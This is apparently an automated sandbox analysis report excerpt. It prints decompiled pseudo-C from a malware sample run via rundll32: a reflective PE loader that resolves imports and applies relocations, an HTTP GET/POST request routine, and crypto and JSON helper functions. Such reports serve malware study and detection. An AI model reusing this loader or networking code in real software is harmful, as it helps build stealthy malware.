                                                                      				_push(0xf0000000);
                                                                      				_push(1);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push( &_v8);
                                                                      				if( *_t25() == 0) {
                                                                      					goto L7;
                                                                      				}
                                                                      				_t20 = _v12(_v8, 4,  &_v16);
                                                                      				 *_t29(_v8, 0);
                                                                      				if(_t20 == 0) {
                                                                      					goto L7;
                                                                      				}
                                                                      				 *_a4 = E041C30D0( &_v16);
                                                                      				return 0;
                                                                      			}












                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,?,041B818C,00000000), ref: 041C3187
                                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 041C319F
                                                                      • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 041C31AD
                                                                      • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 041C31BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule
                                                                      • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                      • API String ID: 667068680-129414566
                                                                      • Opcode ID: da93ad685e7852cea38836994338addeffc457759e0a7e0fa597942e77b59170
                                                                      • Instruction ID: 49b85df1777bd0507b245e743b0aba28499f70d7da43c3ea25fca9cf7b7e3791
                                                                      • Opcode Fuzzy Hash: da93ad685e7852cea38836994338addeffc457759e0a7e0fa597942e77b59170
                                                                      • Instruction Fuzzy Hash: 1B11E932A4031D77DF1296F58C85F9EFBAD9F64790F224168ED10E2140EB70EA048A54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E041BF03B(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				char _v16;
                                                                      				char _v20;
                                                                      				intOrPtr _v24;
                                                                      				signed int _v28;
                                                                      				char _v32;
                                                                      				intOrPtr _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				intOrPtr _v48;
                                                                      				intOrPtr _v52;
                                                                      				intOrPtr _v56;
                                                                      				intOrPtr _v60;
                                                                      				char _v64;
                                                                      				int _v76;
                                                                      				void* _v80;
                                                                      				intOrPtr _v100;
                                                                      				int _v104;
                                                                      				void* _v108;
                                                                      				intOrPtr _v112;
                                                                      				intOrPtr _v116;
                                                                      				char* _v120;
                                                                      				char _v124;
                                                                      				char _v140;
                                                                      				void _v396;
                                                                      				void _v652;
                                                                      				intOrPtr _t91;
                                                                      				intOrPtr _t99;
                                                                      				intOrPtr* _t101;
                                                                      				intOrPtr _t106;
                                                                      				signed int _t107;
                                                                      				void* _t108;
                                                                      				intOrPtr _t109;
                                                                      				signed int _t110;
                                                                      				intOrPtr _t112;
                                                                      				char _t114;
                                                                      				intOrPtr _t119;
                                                                      				intOrPtr _t126;
                                                                      				intOrPtr _t130;
                                                                      				intOrPtr _t134;
                                                                      				intOrPtr _t136;
                                                                      				intOrPtr _t138;
                                                                      				char _t142;
                                                                      				intOrPtr _t144;
                                                                      				void* _t154;
                                                                      				signed int _t156;
                                                                      				intOrPtr _t162;
                                                                      				intOrPtr _t167;
                                                                      				signed int _t168;
                                                                      				signed int _t176;
                                                                      				char _t182;
                                                                      				signed int _t183;
                                                                      				void* _t184;
                                                                      				signed int _t186;
                                                                      				signed int _t187;
                                                                      				signed int _t188;
                                                                      				char _t189;
                                                                      				void* _t190;
                                                                      				void* _t191;
                                                                      				intOrPtr* _t193;
                                                                      
                                                                      				_t157 = __ecx;
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				_t184 = __edx;
                                                                      				_v24 = __ecx;
                                                                      				_v32 = 4;
                                                                      				_v36 = 1;
                                                                      				memset( &_v396, 0, 0x100);
                                                                      				memset( &_v652, 0, 0x100);
                                                                      				_t193 = _t191 + 0x18;
                                                                      				_v64 = E041B90CA(_t157, 0x503);
                                                                      				 *_t193 = 0x14ee;
                                                                      				_v60 = E041B90CA(_t157);
                                                                      				 *_t193 = 0x18a;
                                                                      				_v56 = E041B90CA(_t157);
                                                                      				 *_t193 = 0x128f;
                                                                      				_v52 = E041B90CA(_t157);
                                                                      				 *_t193 = 0xe8b;
                                                                      				_t91 = E041B90CA(_t157);
                                                                      				_v44 = _v44 & 0;
                                                                      				_t182 = 0x3c;
                                                                      				_v48 = _t91;
                                                                      				E041B92A2( &_v124, 0, 0x100);
                                                                      				_v116 = 0x10;
                                                                      				_v120 =  &_v140;
                                                                      				_v124 = _t182;
                                                                      				_v108 =  &_v396;
                                                                      				_v104 = 0x100;
                                                                      				_v80 =  &_v652;
                                                                      				_push( &_v124);
                                                                      				_push(0);
                                                                      				_v76 = 0x100;
                                                                      				_push(E041BCE25(_t184));
                                                                      				_t99 =  *0x41d0fb8; // 0x0
                                                                      				_push(_t184);
                                                                      				if( *((intOrPtr*)(_t99 + 0x28))() != 0) {
                                                                      					_t176 = 0;
                                                                      					__eflags = 0;
                                                                      					_v28 = 0;
                                                                      					do {
                                                                      						_t101 =  *0x41d0fb8; // 0x0
                                                                      						_v12 = 0x8404f700;
                                                                      						_t183 =  *_t101( *0x41d10c8,  *((intOrPtr*)(_t190 + _t176 * 4 - 0x24)), 0, 0, 0);
                                                                      						__eflags = _t183;
                                                                      						if(_t183 != 0) {
                                                                      							E041BEFD3(_t183);
                                                                      							_t106 =  *0x41d0fb8; // 0x0
                                                                      							_t107 =  *((intOrPtr*)(_t106 + 0x1c))(_t183,  &_v396, _v100, 0, 0, 3, 0, 0);
                                                                      							__eflags = _a24;
                                                                      							_t156 = _t107;
                                                                      							if(_a24 != 0) {
                                                                      								E041BC2D1(_a24);
                                                                      							}
                                                                      							__eflags = _t156;
                                                                      							if(_t156 != 0) {
                                                                      								__eflags = _v112 - 4;
                                                                      								_t162 = 0x8484f700;
                                                                      								if(_v112 != 4) {
                                                                      									_t162 = _v12;
                                                                      								}
                                                                      								__eflags = _v24 - 2;
                                                                      								_t108 = 0x41cdf0c;
                                                                      								if(_v24 != 2) {
                                                                      									_t108 = 0x41cdf14;
                                                                      								}
                                                                      								_t164 =  &_v652;
                                                                      								_t109 =  *0x41d0fb8; // 0x0
                                                                      								_t110 =  *((intOrPtr*)(_t109 + 0x20))(_t156, _t108,  &_v652, 0, 0,  &_v64, _t162, 0);
                                                                      								__eflags = _a24;
                                                                      								_t186 = _t110;
                                                                      								_v8 = _t186;
                                                                      								if(_a24 != 0) {
                                                                      									_t164 = _a24;
                                                                      									E041BC2D1(_a24);
                                                                      								}
                                                                      								__eflags = _t186;
                                                                      								if(_t186 != 0) {
                                                                      									__eflags = _v112 - 4;
                                                                      									if(_v112 == 4) {
                                                                      										_t164 = _t186;
                                                                      										E041BEF81(_t186);
                                                                      									}
                                                                      									__eflags = _v24 - 2;
                                                                      									if(_v24 != 2) {
                                                                      										__eflags = 0;
                                                                      										_t112 =  *0x41d0fb8; // 0x0
                                                                      										_v12 =  *((intOrPtr*)(_t112 + 0x24))(_t186, 0, 0, 0, 0);
                                                                      									} else {
                                                                      										_t142 = E041B90CA(_t164, 0xfb3);
                                                                      										_t189 = _t142;
                                                                      										_v16 = _t189;
                                                                      										_t144 =  *0x41d0fb8; // 0x0
                                                                      										_t186 = _v8;
                                                                      										_v12 =  *((intOrPtr*)(_t144 + 0x24))(_t186, _t189, E041BCE25(_t189), _a4, _a8);
                                                                      										E041B9D4C( &_v16);
                                                                      									}
                                                                      									__eflags = _a24;
                                                                      									if(_a24 != 0) {
                                                                      										E041BC2D1(_a24);
                                                                      									}
                                                                      									__eflags = _v12;
                                                                      									if(_v12 != 0) {
                                                                      										L31:
                                                                      										_t114 = 8;
                                                                      										_v32 = _t114;
                                                                      										_v20 = 0;
                                                                      										_v16 = 0;
                                                                      										E041B92A2( &_v20, 0, _t114);
                                                                      										_t119 =  *0x41d0fb8; // 0x0
                                                                      										__eflags =  *((intOrPtr*)(_t119 + 0xc))(_t186, 0x13,  &_v20,  &_v32, 0);
                                                                      										if(__eflags != 0) {
                                                                      											_t187 = E041BC1E4( &_v20, __eflags);
                                                                      											__eflags = _t187 - 0xc8;
                                                                      											if(_t187 == 0xc8) {
                                                                      												 *_a20 = _v8;
                                                                      												 *_a12 = _t183;
                                                                      												 *_a16 = _t156;
                                                                      												__eflags = 0;
                                                                      												return 0;
                                                                      											}
                                                                      											_t188 =  ~_t187;
                                                                      											L35:
                                                                      											_t126 =  *0x41d0fb8; // 0x0
                                                                      											 *((intOrPtr*)(_t126 + 8))(_v8);
                                                                      											L36:
                                                                      											__eflags = _t156;
                                                                      											if(_t156 != 0) {
                                                                      												_t130 =  *0x41d0fb8; // 0x0
                                                                      												 *((intOrPtr*)(_t130 + 8))(_t156);
                                                                      											}
                                                                      											__eflags = _t183;
                                                                      											if(_t183 != 0) {
                                                                      												_t167 =  *0x41d0fb8; // 0x0
                                                                      												 *((intOrPtr*)(_t167 + 8))(_t183);
                                                                      											}
                                                                      											return _t188;
                                                                      										}
                                                                      										GetLastError();
                                                                      										_t188 = 0xfffffff8;
                                                                      										goto L35;
                                                                      									} else {
                                                                      										GetLastError();
                                                                      										_t134 =  *0x41d0fb8; // 0x0
                                                                      										 *((intOrPtr*)(_t134 + 8))(_t186);
                                                                      										_t186 = 0;
                                                                      										__eflags = 0;
                                                                      										goto L26;
                                                                      									}
                                                                      								} else {
                                                                      									GetLastError();
                                                                      									L26:
                                                                      									_t136 =  *0x41d0fb8; // 0x0
                                                                      									 *((intOrPtr*)(_t136 + 8))(_t156);
                                                                      									_t156 = 0;
                                                                      									__eflags = 0;
                                                                      									goto L27;
                                                                      								}
                                                                      							} else {
                                                                      								GetLastError();
                                                                      								L27:
                                                                      								_t138 =  *0x41d0fb8; // 0x0
                                                                      								 *((intOrPtr*)(_t138 + 8))(_t183);
                                                                      								_t183 = 0;
                                                                      								__eflags = 0;
                                                                      								goto L28;
                                                                      							}
                                                                      						}
                                                                      						GetLastError();
                                                                      						L28:
                                                                      						_t168 = _t186;
                                                                      						_t176 = _v28 + 1;
                                                                      						_v28 = _t176;
                                                                      						__eflags = _t176 - 2;
                                                                      					} while (_t176 < 2);
                                                                      					_v8 = _t186;
                                                                      					__eflags = _t168;
                                                                      					if(_t168 != 0) {
                                                                      						goto L31;
                                                                      					}
                                                                      					_t188 = 0xfffffffe;
                                                                      					goto L36;
                                                                      				}
                                                                      				_t154 = 0xfffffffc;
                                                                      				return _t154;
                                                                      			}

































































                                                                      APIs
                                                                      • memset.MSVCRT ref: 041BF070
                                                                      • memset.MSVCRT ref: 041BF081
                                                                        • Part of subcall function 041B92A2: memset.MSVCRT ref: 041B92B4
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 041BF164
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: memset$ErrorLast
                                                                      • String ID: GET$POST
                                                                      • API String ID: 2570506013-3192705859
                                                                      • Opcode ID: fda1794038abb7334e57fdde7bff2816537d24596c6efb2362dbee199807df8d
                                                                      • Instruction ID: ff23e8cfa833957af31d01ae730dc3a416b85b36012e8b4ecae9b537a51dd0c6
                                                                      • Opcode Fuzzy Hash: fda1794038abb7334e57fdde7bff2816537d24596c6efb2362dbee199807df8d
                                                                      • Instruction Fuzzy Hash: DEA1A4B1901218AFEB54DFA5DC84AEEBBB8EF48314F108069F555E7250DB74AD82CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: _snprintfqsort
                                                                      • String ID: %I64d$false$null$true
                                                                      • API String ID: 756996078-4285102228
                                                                      • Opcode ID: f360092c256ad6ce6d4762635c9e9e5e38d0f01ca2e8cc370615f6895aecf989
                                                                      • Instruction ID: b52a8ccf5bf2d18882d2a7517922091708345b59ec595c61806a2f93cb442786
                                                                      • Opcode Fuzzy Hash: f360092c256ad6ce6d4762635c9e9e5e38d0f01ca2e8cc370615f6895aecf989
                                                                      • Instruction Fuzzy Hash: FFE16AB2A4020ABBEF15DE64DCC6EAB3B79EF24244F00845DFD1596141E731EA618FA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 28%
                                                                      			E041C4646(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
                                                                      				signed int _v5;
                                                                      				signed short _v12;
                                                                      				intOrPtr* _v16;
                                                                      				intOrPtr _v20;
                                                                      				signed int* _v24;
                                                                      				unsigned int _v28;
                                                                      				signed short* _v32;
                                                                      				struct HINSTANCE__* _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				intOrPtr* _v48;
                                                                      				signed short* _v52;
                                                                      				intOrPtr _v56;
                                                                      				unsigned int _v60;
                                                                      				intOrPtr _v64;
                                                                      				_Unknown_base(*)()* _v68;
                                                                      				signed int _v72;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				intOrPtr _v84;
                                                                      				unsigned int _v88;
                                                                      				intOrPtr _v92;
                                                                      				signed int _v96;
                                                                      				intOrPtr _v100;
                                                                      				intOrPtr _v104;
                                                                      				intOrPtr _v108;
                                                                      				intOrPtr _v112;
                                                                      				CHAR* _v116;
                                                                      				signed int _v120;
                                                                      				intOrPtr _v124;
                                                                      				signed int _v128;
                                                                      				signed int _v132;
                                                                      				signed int _t220;
                                                                      				signed int _t237;
                                                                      				void* _t277;
                                                                      				signed int _t282;
                                                                      				signed int _t284;
                                                                      				intOrPtr _t324;
                                                                      
                                                                      				_v44 = _v44 & 0x00000000;
                                                                      				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                      				_v20 = _v84;
                                                                      				_t324 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
                                                                      				_v64 = _t324;
                                                                      				if(_t324 == 0) {
                                                                      					L13:
                                                                      					while(0 != 0) {
                                                                      					}
                                                                      					_push(8);
                                                                      					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
                                                                      						L35:
                                                                      						if(_a16 == 0) {
                                                                      							L54:
                                                                      							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
                                                                      							while(0 != 0) {
                                                                      							}
                                                                      							if(_a12 != 0) {
                                                                      								 *_a12 = _v80;
                                                                      							}
                                                                      							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
                                                                      							E041C43F4(GetCurrentProcess(),  *0x41d0fe4, _t203, _a4, _a4);
                                                                      							_v124 = _v80(_a4, 1, _a8);
                                                                      							while(0 != 0) {
                                                                      							}
                                                                      							if(_v124 != 0) {
                                                                      								if(_v44 == 0) {
                                                                      									L77:
                                                                      									return 1;
                                                                      								}
                                                                      								if(_a20 != 1) {
                                                                      									if(_a20 != 2) {
                                                                      										L75:
                                                                      										while(0 != 0) {
                                                                      										}
                                                                      										goto L77;
                                                                      									}
                                                                      									while(0 != 0) {
                                                                      									}
                                                                      									_v132 = _v44;
                                                                      									goto L75;
                                                                      								}
                                                                      								while(0 != 0) {
                                                                      								}
                                                                      								_v44();
                                                                      								goto L75;
                                                                      							}
                                                                      							while(0 != 0) {
                                                                      							}
                                                                      							return 0;
                                                                      						}
                                                                      						while(0 != 0) {
                                                                      						}
                                                                      						_push(8);
                                                                      						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
                                                                      							goto L54;
                                                                      						}
                                                                      						_v128 = 0x80000000;
                                                                      						_t220 = 8;
                                                                      						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t220 * 0));
                                                                      						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
                                                                      						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
                                                                      						_v104 =  *((intOrPtr*)(_v76 + 0x18));
                                                                      						while(0 != 0) {
                                                                      						}
                                                                      						_v40 = _v40 & 0x00000000;
                                                                      						while(_v40 < _v104) {
                                                                      							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
                                                                      							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
                                                                      							if(lstrcmpA(_v116, _a16) != 0) {
                                                                      								_v40 = _v40 + 1;
                                                                      								continue;
                                                                      							}
                                                                      							while(0 != 0) {
                                                                      							}
                                                                      							_v44 = _v120;
                                                                      							break;
                                                                      						}
                                                                      						if(_v44 != 0) {
                                                                      							goto L54;
                                                                      						}
                                                                      						while(0 != 0) {
                                                                      						}
                                                                      						return 0xffffffff;
                                                                      					}
                                                                      					_v96 = 0x80000000;
                                                                      					_t237 = 8;
                                                                      					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t237 << 0) + 0x78));
                                                                      					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                                                      						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                      						if(_v36 == 0) {
                                                                      							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                      						}
                                                                      						if(_v36 != 0) {
                                                                      							if( *_v16 == 0) {
                                                                      								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                                                      							} else {
                                                                      								_v24 =  *_v16 + _a4;
                                                                      							}
                                                                      							_v72 = _v72 & 0x00000000;
                                                                      							while( *_v24 != 0) {
                                                                      								if(( *_v24 & _v96) == 0) {
                                                                      									_v100 =  *_v24 + _a4;
                                                                      									_v68 = GetProcAddress(_v36, _v100 + 2);
                                                                      								} else {
                                                                      									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
                                                                      								}
                                                                      								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                                                      									 *_v24 = _v68;
                                                                      								} else {
                                                                      									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
                                                                      								}
                                                                      								_v24 =  &(_v24[1]);
                                                                      								_v72 = _v72 + 4;
                                                                      							}
                                                                      							_v16 = _v16 + 0x14;
                                                                      							continue;
                                                                      						} else {
                                                                      							_t277 = 0xfffffffd;
                                                                      							return _t277;
                                                                      						}
                                                                      					}
                                                                      					goto L35;
                                                                      				}
                                                                      				_t282 = 8;
                                                                      				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t282 * 5));
                                                                      				_t284 = 8;
                                                                      				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t284 * 5));
                                                                      				while(0 != 0) {
                                                                      				}
                                                                      				while(_v56 > 0) {
                                                                      					_v28 = _v52[2];
                                                                      					_v56 = _v56 - _v28;
                                                                      					_v28 = _v28 - 8;
                                                                      					_v28 = _v28 >> 1;
                                                                      					_v32 =  &(_v52[4]);
                                                                      					_v92 = _a4 +  *_v52;
                                                                      					_v60 = _v28;
                                                                      					while(1) {
                                                                      						_v88 = _v60;
                                                                      						_v60 = _v60 - 1;
                                                                      						if(_v88 == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                                                      						_v12 =  *_v32 & 0xfff;
                                                                      						_v48 = (_v12 & 0x0000ffff) + _v92;
                                                                      						if((_v5 & 0x000000ff) != 3) {
                                                                      							if((_v5 & 0x000000ff) == 0xa) {
                                                                      								 *_v48 =  *_v48 + _v64;
                                                                      							}
                                                                      						} else {
                                                                      							 *_v48 =  *_v48 + _v64;
                                                                      						}
                                                                      						_v32 =  &(_v32[1]);
                                                                      					}
                                                                      					_v52 = _v32;
                                                                      				}
                                                                      				goto L13;
                                                                      			}










































                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 041C47AD
                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 041C47C6
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 041C4822
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 041C4841
                                                                      • lstrcmpA.KERNEL32(?,00000000), ref: 041C4932
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 041C498F
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$CurrentHandleLibraryLoadModuleProcesslstrcmp
                                                                      • String ID:
                                                                      • API String ID: 2598995400-0
                                                                      • Opcode ID: 50c481efc08cf4bc195354fb75df5c0f6944f54c9dcb5556d8462fe9b96dc24c
                                                                      • Instruction ID: 06557748ec44650371c6ee5fc6674609a78305da64388ca3c1bb09c46dd70153
                                                                      • Opcode Fuzzy Hash: 50c481efc08cf4bc195354fb75df5c0f6944f54c9dcb5556d8462fe9b96dc24c
                                                                      • Instruction Fuzzy Hash: C1E1BE75E08219DFDB14CFA8C891BADBBB1FF18314F1485AAE815AB391D734A981CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 041BD307
                                                                      • SysAllocString.OLEAUT32(?), ref: 041BD30F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 041BD323
                                                                      • SysFreeString.OLEAUT32(?), ref: 041BD39E
                                                                      • SysFreeString.OLEAUT32(?), ref: 041BD3A1
                                                                      • SysFreeString.OLEAUT32(?), ref: 041BD3A6
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: String$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 344208780-0
                                                                      • Opcode ID: dfe8ec133177a3518e153d06b5497069b46a268141f0847010f3cc332bfd8923
                                                                      • Instruction ID: 78282d1c80c2ebfc5eff616ba8dfa84ca77933d7a32a44d6385cd3336f1b3461
                                                                      • Opcode Fuzzy Hash: dfe8ec133177a3518e153d06b5497069b46a268141f0847010f3cc332bfd8923
                                                                      • Instruction Fuzzy Hash: 5F212BB5900218BFDB04DFA5CD88DEEBBBCEF48254B10449AF505E7250D775AE01CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$\u%04X$\u%04X\u%04X
                                                                      • API String ID: 0-2132903582
                                                                      • Opcode ID: 4e8339e68a67e94e445e2dcaad0585e5dbeb3deabe74d7e7ce31701f53814a4e
                                                                      • Instruction ID: 465dfc9e077f42347b5fa2de2b4a35436652d8bb057eff32a2a1aad84e8088e0
                                                                      • Opcode Fuzzy Hash: 4e8339e68a67e94e445e2dcaad0585e5dbeb3deabe74d7e7ce31701f53814a4e
                                                                      • Instruction Fuzzy Hash: BF41C031E00209A7EB294DAD9EC9BBE3B149F79344F1414EDFD02E6684E371F99192D2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E041C3BFE(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                      				signed int _t12;
                                                                      				signed int _t13;
                                                                      				signed int _t23;
                                                                      				void* _t30;
                                                                      				char* _t31;
                                                                      				char* _t33;
                                                                      				char* _t35;
                                                                      				char* _t37;
                                                                      				char* _t38;
                                                                      				long long* _t40;
                                                                      
                                                                      				_t30 = __edi;
                                                                      				_t12 = _a20;
                                                                      				if(_t12 == 0) {
                                                                      					_t12 = 0x11;
                                                                      				}
                                                                      				_t35 = _a4;
                                                                      				_push(_t25);
                                                                      				 *_t40 = _a12;
                                                                      				_push(_t12);
                                                                      				_push("%.*g");
                                                                      				_push(_a8);
                                                                      				_push(_t35);
                                                                      				L041C3D57();
                                                                      				_t23 = _t12;
                                                                      				if(_t23 < 0 || _t23 >= _a8) {
                                                                      					L16:
                                                                      					_t13 = _t12 | 0xffffffff;
                                                                      					goto L17;
                                                                      				} else {
                                                                      					E041C3BD7(_t12, _t35);
                                                                      					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
                                                                      						L8:
                                                                      						_push(_t30);
                                                                      						_t37 = strchr(_t35, 0x65);
                                                                      						_t31 = _t37;
                                                                      						if(_t37 == 0) {
                                                                      							L15:
                                                                      							_t13 = _t23;
                                                                      							L17:
                                                                      							return _t13;
                                                                      						}
                                                                      						_t38 = _t37 + 1;
                                                                      						_t33 = _t31 + 2;
                                                                      						if( *_t38 == 0x2d) {
                                                                      							_t38 = _t33;
                                                                      						}
                                                                      						while( *_t33 == 0x30) {
                                                                      							_t33 = _t33 + 1;
                                                                      						}
                                                                      						if(_t33 != _t38) {
                                                                      							E041B9227(_t38, _t33, _t23 - _t33 + _a4);
                                                                      							_t23 = _t23 + _t38 - _t33;
                                                                      						}
                                                                      						goto L15;
                                                                      					} else {
                                                                      						_t6 = _t23 + 3; // 0x41c23e9
                                                                      						_t12 = _t6;
                                                                      						if(_t12 >= _a8) {
                                                                      							goto L16;
                                                                      						}
                                                                      						_t35[_t23] = 0x302e;
                                                                      						( &(_t35[2]))[_t23] = 0;
                                                                      						_t23 = _t23 + 2;
                                                                      						goto L8;
                                                                      					}
                                                                      				}
                                                                      			}














                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
